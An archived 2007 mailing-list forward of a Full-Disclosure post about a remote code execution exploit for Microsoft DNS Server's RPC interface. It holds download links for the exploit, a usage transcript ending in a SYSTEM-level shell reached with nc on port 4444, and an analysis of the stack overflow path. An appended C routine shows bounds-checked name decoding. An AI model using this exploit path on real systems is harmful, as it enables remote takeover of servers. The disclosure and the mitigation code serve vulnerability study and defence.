Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: Microsoft DNS Server Remote Code execution Exploit and analysis



The source code contains explanations of the vulnerability.

> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx 
> [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf 
> Of Andres Tarasco
> Sent: Monday, April 16, 2007 6:53 AM
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] Microsoft DNS Server Remote Code 
> executionExploit and analysis
> 
> Hi,
> 
> I'm sending you the headers of the new exploit code for
> Microsoft DNS servers. You can download the full source code
> exploit and analysis at:
>
> - http://www.514.es/Microsoft_Dns_Server_Exploit.zip
> or
> - http://www.48bits.com/exploits/dnsxpl.rar
> 
> 
>  Microsoft DNS Server Remote Code execution Exploit and analysis 
>    Advisory: 
> http://www.microsoft.com/technet/security/advisory/935964.mspx
>    This remote exploit works against port 445 (also Microsoft 
> RPC api used) 
> 
>   Author:
>   * Mario Ballano  ( mballano~gmail.com )  
>   * Andres Tarasco ( atarasco~gmail.com )
>    
>   Timeline:
>   * April,12,2007: Microsoft advisory published
>   * April,13,2007: POC Exploit coded 
>   * April,14,2007: Microsoft notified about a new attack 
> vector against port 445 (this exploit code)
>   * April,14,2007: Working exploit for Windows 2000 server 
> SP4 (Spanish)
>   * April,15,2007: Working exploit for Windows 2003 server 
> SP2 (Spanish) /GS bypassed 
>   * April,16,2007: hackers hax the w0rld and got busted.
>   * April,xx,2007: Lammer release the first buggy worm
>   * Xxxxx,xx,2007: Finally it was true. Naked photos of Gary m.. being abducted were found at NSA servers
>   
>   
>   Usage:
>   D:\DNSTEST>dnstest.exe 192.168.1.7
>     -------------------------------------------------------
>     Microsoft Dns Server local & remote RPC Exploit code (port 445) 
>     Exploit code by Andres Tarasco & Mario Ballano
>     Tested against Windows 2000 server SP4 and Windows 2003 
> SP2 (Spanish)
>     -------------------------------------------------------
> 
>    [+] Trying to fingerprint target.. 05 02 
>    [+] Remote Host identified as Windows 2003
>    [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:192.168.1.7[\\pipe\\dnsserver]
>    [+] RpcBindingFromStringBinding returned 0x0
>    [+] Calling remote procedure DnssrvOperation() 
>    [+] Now try to connect to port 4444
> 
>   D:\DNSTEST>nc 192.168.1.7 4444
>    Microsoft Windows [Version 5.2.3790]
>    (C) Copyright 1985-2003 Microsoft Corp.
> 
>    C:\WINDOWS\system32>whoami 
>    nt authority\system  
> 
>   Vulnerability Analysis:
> 
>   The function Lookup_ZoneTreeNodeFromDottedName() uses a fixed local buffer to convert
>   a string calling Name_ConvertFileNameToCountName(), this string can contain back-slash
>   octal characters. Although some bounds checks are done when writing to the buffer it is
>   still possible to bypass them using a string with multiple backslashed chars, resulting
>   in a stack based buffer overflow.
> 
>   This function can be reached through DNS RPC Interface, the execution flow
>   will be as follows:
>
>   R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd);                  // RPC Exported function
>   R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd);
>   RpcUtil_FindZone(buggybuffer,1,DesiredAccess);
>   Zone_FindZoneByName(buggybuffer);                                   // Here we go!
>   Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000);
>     Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0);       // Using fixed size local buffer
>       extractQuotedChar(x,x,buggybuffer);                             // Extract octal number
>
>   Disassemblies at the end of the code:
> 
>   References:
>   - Defeating the Stack Based Buffer Overflow Prevention 
> Mechanism of Microsoft Windows 2003 Server. (David 
> Litchfield, NGSSoftware). 
>   - www.48bits.com
>   - http://www.514.es
> 
>   Just compile the code with nmake and have fun!
> 
> 
> */ 
> 
> 
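The flaw class described in the analysis above (a fixed buffer whose bounds checks can be bypassed by backslash-escaped characters) is avoided when every output byte, plain or escaped, goes through one checked write. The following is an added example, not code from the original post or from Microsoft; the names `name_to_labels`, `put` and `new_label`, the escape form (backslash plus one to three octal digits) and the length-prefixed output are assumptions.

```c
#include <stddef.h>

/* Added example, not Microsoft's code. Assumed escape form: backslash plus
 * 1-3 octal digits. Output: length-prefixed labels (RFC 1035 wire form). */
#define MAX_LABEL 63
struct out { unsigned char *buf; size_t cap, len, lab; }; /* lab: index of current length byte */

/* Single choke point for label bytes: plain and escaped characters both
 * pass through here, so neither path can skip the capacity check. */
static int put(struct out *o, unsigned char c)
{
    if (o->len >= o->cap || o->buf[o->lab] >= MAX_LABEL)
        return -1;                 /* reject; never truncate or write past cap */
    o->buf[o->len++] = c;
    o->buf[o->lab]++;
    return 0;
}

static int new_label(struct out *o)    /* reserve the next length byte */
{
    if (o->len >= o->cap)
        return -1;
    o->lab = o->len;
    o->buf[o->len++] = 0;
    return 0;
}

/* Returns the encoded length, or -1 on overflow or malformed input. */
long name_to_labels(const char *src, unsigned char *dst, size_t cap)
{
    struct out o = { dst, cap, 0, 0 };
    if (new_label(&o)) return -1;
    for (; *src; src++) {
        if (*src == '.') {
            if (o.buf[o.lab] == 0 || new_label(&o))
                return -1;         /* empty label or no room */
        } else if (*src == '\\') {
            unsigned v = 0, n = 0;
            for (; n < 3 && src[1] >= '0' && src[1] <= '7'; n++)
                v = v * 8 + (unsigned)(*++src - '0');
            if (n == 0 || v > 255 || put(&o, (unsigned char)v))
                return -1;         /* bad escape or no room */
        } else if (put(&o, (unsigned char)*src)) {
            return -1;
        }
    }
    if (o.buf[o.lab] != 0 && new_label(&o))
        return -1;                 /* room for the root terminator too */
    return (long)o.len;
}
```

The decoder rejects oversized input instead of truncating it, so a caller cannot mistake a partial name for a valid one.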



 




Copyright © Lexa Software, 1996-2009.